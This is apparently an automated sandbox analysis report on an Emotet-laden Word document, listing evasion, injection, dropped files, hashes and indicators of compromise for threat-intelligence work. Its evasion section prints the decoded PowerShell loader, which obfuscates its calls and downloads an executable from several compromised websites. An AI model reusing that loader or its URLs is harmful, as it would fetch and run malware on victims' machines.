Source: C:\Users\user\982.exe TID: 3744 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\sortedwatched.exe TID: 3836 Thread sleep time: -60000s >= -30000s
Contains functionality to query system information
Source: C:\Users\user\982.exe Code function: 4_2_00427ECC VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect, 4_2_00427ECC
Program exit points
Source: C:\Users\user\982.exe API call chain: ExitProcess graph end node graph_4-29872
Source: C:\Users\user\982.exe API call chain: ExitProcess graph end node graph_5-2880
Source: C:\Users\user\982.exe API call chain: ExitProcess graph end node graph_7-2847
Source: C:\Windows\System32\sortedwatched.exe API call chain: ExitProcess graph end node graph_12-2829
Source: C:\Windows\System32\sortedwatched.exe API call chain: ExitProcess graph end node graph_12-2837
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe System information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\982.exe Code function: 4_2_0042E3B3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_0042E3B3
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\982.exe Code function: 4_2_00427ECC VirtualProtect ?,-00000001,00000104,? 4_2_00427ECC
Contains functionality to dynamically determine API calls
Source: C:\Users\user\982.exe Code function: 4_2_00432522 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 4_2_00432522
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\982.exe Code function: 4_2_004016A0 GetProcessHeap,HeapFree, 4_2_004016A0
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Contains functionality to register its own exception handler
Source: C:\Users\user\982.exe Code function: 4_2_0042B721 SetUnhandledExceptionFilter, 4_2_0042B721
Source: C:\Users\user\982.exe Code function: 4_2_0042E3B3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_0042E3B3
Source: C:\Users\user\982.exe Code function: 4_2_0043146A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_0043146A
Source: C:\Users\user\982.exe Code function: 4_2_00427DFF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00427DFF

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found
Source: unknownProcess created: Base64 decoded $mHKwRF='JIbnvfoL';$b3aSim4_ = '982';$GvHK2M='n_vPjrp';$QziABB6L=$env:userprofile+'\'+$b3aSim4_+'.exe';$jwt7_N='Z6G6oToS';$z_nf09=.('new-'+'ob'+'ject') nEt.WebClient;$EIpSGwu='https://sabiosdelamor.co/wp-content/VtyEqoElo/@https://www.euroausili.it/wp-content/iIFSXTWmN/@https://opel.km.ua/blogs/3uju_tiowf9i-149/@https://hablabestop.live/rqbe9p/pKkLiuqGj/@https://dogongulong.vn/wp-admin/vaIDeyDj/'."sP`liT"('@');$Xn9Tjqi='W548GPbi';foreach($CiXHiW in $EIpSGwu){try{$z_nf09."d`ow`N`lOADFIle"($CiXHiW, $Qz
Maps a DLL or memory area into another process
Source: C:\Users\user\982.exe Section loaded: unknown target pid: 3668 protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\982.exe Thread register set: target process: 3668
Source: C:\Users\user\982.exe Thread register set: target process: 3600
Source: C:\Windows\System32\sortedwatched.exe Thread register set: target process: 3704
Source: C:\Windows\System32\sortedwatched.exe Thread register set: target process: 3780
Sets debug register (to hijack the execution of another thread)
Source: C:\Users\user\982.exe Thread register set: 3668 775EA4F4
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -encod 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

Language, Device and Operating System Detection:

Contains functionality locales information (e.g. system language)
Source: C:\Users\user\982.exe Code function: GetLocaleInfoA, 4_2_00435022
Source: C:\Users\user\982.exe Code function: GetLocaleInfoW,__snwprintf_s,LoadLibraryW, 4_2_0041CEDC
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\982.exe Code function: 4_2_004093C0 cpuid 4_2_004093C0
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\982.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\sortedwatched.exe Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\982.exe Code function: 4_2_0042C660 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,RtlQueryPerformanceCounter, 4_2_0042C660
Contains functionality to query windows version
Source: C:\Users\user\982.exe Code function: 4_2_0040B793 _memset,GetVersionExA, 4_2_0040B793
Queries the cryptographic machine GUID
Source: C:\Users\user\982.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

[Figure: behavior graph, ID 961422. Sample: Nuovo_documento_2019.09.20.doc. Start date: 20/09/2019. Architecture: WINDOWS. Score: 100.]

Simulations

Behavior and APIs

Time | Type | Description
13:29:43 | API Interceptor | 47x Sleep call for process: powershell.exe modified
13:29:48 | API Interceptor | 67x Sleep call for process: 982.exe modified
13:29:59 | API Interceptor | 892x Sleep call for process: sortedwatched.exe modified

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Nuovo_documento_2019.09.20.doc | 22% | Virustotal |
Nuovo_documento_2019.09.20.doc | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\982.exe | 16% | Virustotal |

Unpacked PE Files

Source | Detection | Scanner | Label
7.1.982.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
5.2.982.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.2.sortedwatched.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
9.2.sortedwatched.exe.5a3000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
7.2.982.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
6.2.982.exe.493000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
11.2.sortedwatched.exe.5b3000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.1.sortedwatched.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.2.982.exe.523000.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.1.sortedwatched.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.sortedwatched.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
5.1.982.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains

Source | Detection | Scanner | Label
sabiosdelamor.co | 0% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://181.164.8.25/attrib/schema/pdf/merge/ | 0% | Avira URL Cloud | safe
http://181.164.8.25/attrib/schema/pdf/merge/n | 0% | Avira URL Cloud | safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source | Rule | Description | Author | Strings
0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x3750:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000007.00000002.324668034.00400000.00000040.00000001.sdmp | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
0000000A.00000002.322151721.00400000.00000040.00000001.sdmp | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
0000000B.00000002.327425390.005B3000.00000004.00000001.sdmp | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
0000000A.00000001.321515804.00400000.00000040.00020000.sdmp | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000007.00000001.301581248.00400000.00000040.00020000.sdmp | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000004.00000002.296876594.002C0000.00000040.00000001.sdmp | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x3750:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000006.00000002.302449572.003E0000.00000040.00000001.sdmp | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x3750:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
0000000C.00000002.559716338.00400000.00000040.00000001.sdmp | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
0000000C.00000001.326445222.00400000.00000040.00020000.sdmp | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000006.00000002.302707019.00493000.00000004.00000001.sdmp | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000005.00000002.296478770.00400000.00000040.00000001.sdmp | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000009.00000002.323191242.005A3000.00000004.00000001.sdmp | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000005.00000001.295966721.00400000.00000040.00020000.sdmp | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000009.00000002.322934550.003E0000.00000040.00000001.sdmp | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x3750:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
00000004.00000002.297316445.00523000.00000004.00000001.sdmp | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.982.exe.400000.0.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
7.1.982.exe.400000.0.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
12.1.sortedwatched.exe.400000.0.raw.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
10.2.sortedwatched.exe.400000.0.raw.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
10.2.sortedwatched.exe.400000.0.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
9.2.sortedwatched.exe.5a3000.2.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x611:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
12.2.sortedwatched.exe.400000.0.raw.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
4.2.982.exe.523000.2.raw.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
7.2.982.exe.400000.0.raw.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
5.2.982.exe.400000.0.raw.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
7.1.982.exe.400000.0.raw.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
7.2.982.exe.400000.0.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
6.2.982.exe.493000.2.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x611:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
11.2.sortedwatched.exe.5b3000.2.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x611:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
11.2.sortedwatched.exe.5b3000.2.raw.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
10.1.sortedwatched.exe.400000.0.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
5.1.982.exe.400000.0.raw.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
4.2.982.exe.523000.2.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x611:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
6.2.982.exe.493000.2.raw.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
9.2.sortedwatched.exe.5a3000.2.raw.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
12.1.sortedwatched.exe.400000.0.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
10.1.sortedwatched.exe.400000.0.raw.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
12.2.sortedwatched.exe.400000.0.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
5.1.982.exe.400000.0.unpack | Emotet | detect Emotet in memory | JPCERT/CC Incident Response Group | 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
149.167.86.174 | http://psicologiagrupal.cl/wp-admin/FILE/eSzL4nhVV/ | malicious |
149.167.86.174 | DZB_V176H033B3E4VU_LN.doc | malicious |
149.167.86.174 | 2019_04- Balance & Payment Report.doc | malicious |
149.167.86.174 | 2019_04- Balance & Payment Report.doc | malicious |
149.167.86.174 | 32DOCO214512852.js | malicious |
198.49.65.242 | Attachment-8713-G777079.doc | malicious | urbandogscol.com/wp-content/xiqjp4/
198.49.65.242 | Attachment-8713-G777079.doc | malicious | urbandogscol.com/wp-content/xiqjp4/
198.49.65.242 | Attachment-8713-G777079.doc | malicious | urbandogscol.com/wp-content/xiqjp4/
181.164.8.25 | DZB_V176H033B3E4VU_LN.doc | malicious |

Domains

Match | Associated Sample Name / URL | Detection | Context
sabiosdelamor.co | DZB_V176H033B3E4VU_LN.doc | malicious | 198.49.65.242
sabiosdelamor.co | DZB_V176H033B3E4VU_LN.doc | malicious | 198.49.65.242

ASN

Match | Associated Sample Name / URL | Detection | Context
unknown | Invoice0186.pdf | malicious | 192.168.0.40
unknown | P_2038402.xlsx | malicious | 192.168.0.44
unknown | bad.pdf | malicious | 192.168.0.44
unknown | RFQ.pdf | malicious | 192.168.0.44
unknown | 100323.pdf | malicious | 192.168.0.44
unknown | Copy.pdf | malicious | 127.0.0.1
unknown | 2.exe | malicious | 192.168.0.40
unknown | UPPB502981.doc | malicious | 192.168.0.44
unknown | Adm_Boleto.via2.com | malicious | 192.168.0.40
unknown | 00ECF4AD.exe | malicious | 192.168.0.40
unknown | PDF_100987464500.exe | malicious | 192.168.0.40
unknown | filedata.exe | malicious | 192.168.0.40
unknown | .exe | malicious | 192.168.1.60
unknown | 33redacted@threatwave.com | malicious | 192.168.1.71

JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
05af1f5ca1b87cc9cc9b25185115607d | Your_Purchase_4396143.xls | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | Bofa_Charge01312019.xlsm | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | C_ACH_02042019.xlsm | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | C_ACH_02042019.xlsm | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | 14308278291.xlsm | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | FILEY595000383.doc | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | FILEY595000383.doc | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | PO53473.doc | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | Facture_Num_OFH30703.doc | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | DOK97159672110.doc | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | vXZa4D4m4V.xls | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | Prepared_Purchase_Info_429458.doc | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | 1704007#U682a#U5f0f#U4f1a#U793e04082.xls | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | 62918504564317 .xls | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | 571275114140SS .xls | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | Documento.FT.60803.modifiche_societarie.xls | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | Documento_081507_FT_20190415_0006009_.xls | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | Documento_057496_FT_20190415_0005008_.xls | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | Scanmalta Client Invoice Statements.xls | malicious | 198.49.65.242
05af1f5ca1b87cc9cc9b25185115607d | fee-docs.doc | malicious | 198.49.65.242

              Dropped Files

              Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
              C:\Users\user\982.exe | DZB_V176H033B3E4VU_LN.doc | Get hash | malicious | Browse |

                Startup

                • System is w7_1
                • WINWORD.EXE (PID: 3204 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 5D798FF0BE2A8970D932568068ACFD9D)
                • powershell.exe (PID: 3456 cmdline: powershell -encod [encoded command elided] MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
                  • 982.exe (PID: 3644 cmdline: 'C:\Users\user\982.exe' MD5: 3A74A93E7831D0953B5CEFB9C98505F1)
                    • 982.exe (PID: 3668 cmdline: 'C:\Users\user\982.exe' MD5: 3A74A93E7831D0953B5CEFB9C98505F1)
                      • 982.exe (PID: 3696 cmdline: --4e722ada MD5: 3A74A93E7831D0953B5CEFB9C98505F1)
                        • 982.exe (PID: 3600 cmdline: --4e722ada MD5: 3A74A93E7831D0953B5CEFB9C98505F1)
                • mscorsvw.exe (PID: 3528 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe MD5: BD2AE15EFB47E5215B4D0C59EA00C91A)
                • sortedwatched.exe (PID: 3732 cmdline: C:\Windows\system32\sortedwatched.exe MD5: 3A74A93E7831D0953B5CEFB9C98505F1)
                  • sortedwatched.exe (PID: 3704 cmdline: C:\Windows\system32\sortedwatched.exe MD5: 3A74A93E7831D0953B5CEFB9C98505F1)
                    • sortedwatched.exe (PID: 3672 cmdline: --2a75e385 MD5: 3A74A93E7831D0953B5CEFB9C98505F1)
                      • sortedwatched.exe (PID: 3780 cmdline: --2a75e385 MD5: 3A74A93E7831D0953B5CEFB9C98505F1)
                • cleanup

                Created / dropped Files

                C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_041d84af-7e76-450d-8340-55db3c73c359
                Process:C:\Windows\System32\sortedwatched.exe
                File Type:data
                Size (bytes):2134
                Entropy (8bit):7.082471693816772
                Encrypted:false
                MD5:7B2759997F3D8E28C124D04DC495C0B5
                SHA1:30F9D822FC7B2A2E6A2EC1767949F739BF9CBC4C
                SHA-256:464553C0BA166E1C354DDC6477C6D466584F37E3367442B4653ACFA5D7234B7D
                SHA-512:57858DA819CB6F76C9F5CCAECDC06784F04960E39E78FEBA6E9CECBCC644B8242CE1DD90AB8919133DD789DFDF54A546CAE72EFA54F9E590ACBB013800CDCC43
                Malicious:false
                Reputation:low
                C:\Users\user\982.exe
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Size (bytes):425472
                Entropy (8bit):6.712476322966454
                Encrypted:false
                MD5:3A74A93E7831D0953B5CEFB9C98505F1
                SHA1:C74D84DE41D9294DA948D3CAACDDED254853E57C
                SHA-256:8743FB2C992EE623779B119C5BB06F9A523E2F335B0E64B8E133C4867295CE3C
                SHA-512:DA385FEAC0E13C7D8F4A7BECC92EDA980D160E0FF570F6193E111D3D5EB14B423CBC8329C146ECA01D27251B83DEB8E3ACE00FD3008935420B5767F1EE195290
                Malicious:true
                Antivirus:
                • Antivirus: Virustotal, Detection: 16%, Browse
                Joe Sandbox View:
                • Filename: DZB_V176H033B3E4VU_LN.doc, Detection: malicious, Browse
                Reputation:low
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13E77F69.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.286841866831989
                Encrypted:false
                MD5:8C3F121AF11549FD53782F48C92863D3
                SHA1:227F2DB68F6CF48489CF45B6253A95DA2AB0643F
                SHA-256:043D38B5DB46967F5D533DEB42B91BDF0273885C5CE262CA9C67A9A4A9983AF5
                SHA-512:09352127D65F17BF3BA277823DF7FB0A8150FA9C1558C25FF79D13759E33E022E6F17BB7309974E7E14CE75F21A63B22D9237193B6E2322C8E57C656BFB04F46
                Malicious:false
                Reputation:low
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2236A463.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.2970430492936575
                Encrypted:false
                MD5:1D6F8498528BC890F9D1F7E62C97FC7F
                SHA1:B4632AAFC6219F49B64B317DB055F489FE4D9F45
                SHA-256:ABD26B7A339B79834B412075E175C9A5EABF5CA54A72DE1B8EA8AEA72B5973F2
                SHA-512:40A570353B9327B0FA9F9E70AD37959AF91181B67084FBA11E0A654BB812BFEBFC074A1DE08504A631A92A9AB9CB4E9DB4101934ADCEF1B22681A26E1DCDA5C1
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\23282B10.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.186201474676835
                Encrypted:false
                MD5:33AA36BEF062419D9E597A3F8B74B112
                SHA1:26210D9DE88E70C17EC205BC721E9A36888D71E7
                SHA-256:DDFF1BFC68E7353E58F228892DBB3809CBCE1362F9512004E4814EB6F4716CF0
                SHA-512:905A7CFB5B9A09B3CDB7E937521776981E992D85BB13D0D0BF80F18B3BA533B54E5F67B1D3D2C0F98C4066FDF027ECBA9FF6AB0F8EEDE51B6ED6C596C911196F
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C5693CD.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.2970430492936575
                Encrypted:false
                MD5:19A6FA2277408604E977C82E69985C8F
                SHA1:3CA249BFE7EC0692E32025F329D9C81711416607
                SHA-256:1B1F7FD642D4DE67EB37C28EBAB040F51B64009A14DB698678E78D6E2ED1BBE1
                SHA-512:0BDCCFD75065E1EDD3DBF1E478F9161225CCE52D539BD5E8187A7F7C1F5643867F695FA846B40076D667CB4C0A8125F01D35F2F27FFBFCCBF8786FE46EC12FC2
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DC6D560.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.19202389012249
                Encrypted:false
                MD5:0B2B1CB43D0C41B4DC860F15F9BE100B
                SHA1:EC12B6120297397176A0BCC923D451F8012AF73A
                SHA-256:17F15496F05D223F00CF474F82EBB6D8D2D8D4AEBEEA3270EED82C173B1CA89C
                SHA-512:DC14330EDCF351722B80A53E3F6B0F451B2363B64F8211B8972C7B89ECF5C45DF411327419723A348F79D71DB5B729556F2058E86A87634A049A3865504B262D
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E4E2F6A.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.1785803518075975
                Encrypted:false
                MD5:AE2B2DF9253D2FCC2C0E7C0050EA03EE
                SHA1:0D539A73FB33D7BB30AB74C159E5F264AC8E6D7D
                SHA-256:2F0B2BD8F4EB5C834A8AF7AE4F167780A8891F5CB9F8BE2DC0980CB71A3C331C
                SHA-512:023D37070C0C865BB58A09055D91DD59DCB1348C0B1670B9ED47C85D8C3BFA2ED47CD6433D87C36BC9D50C7B802367CB8BCD345EA9DB5BBF5FD8085B9879308B
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\346B6F26.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.1958963691236155
                Encrypted:false
                MD5:C4B5A00071FB029B90FC7E2B39E29688
                SHA1:2DE333A3B6F71605D595634CC803F4E46694A6A6
                SHA-256:1A6C649A44DB791193674747E1B12AB2D6A5F8CCC495E7CD0D83EB2E2818C475
                SHA-512:E2F4ED6B4253A22C244F7BE373D45789A32DDB32B5F440209C4D192BC384C1E9A22B3435FACFCBBA5708E935BE9ED09D38F9C4B54D37DBE97C794483D5B895A1
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3776ABB0.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.200681898780499
                Encrypted:false
                MD5:987EC44F0DB7F47F706543612DF34325
                SHA1:3B8282C9478FB02FF805BF793042B2C28C353B44
                SHA-256:8641D94B165FE092700CDAB44A372FDBD964864DDD1313D689BED48B35A9D942
                SHA-512:539484847795354DF9CEFE5DD6A369EB2814AF02B053E83A9793873734D42AE7611D1355964BBC5D100008B29486B6C39D1EE3D5FEA05891F8E6961DA2AAB690
                Malicious:false
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B413F79.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
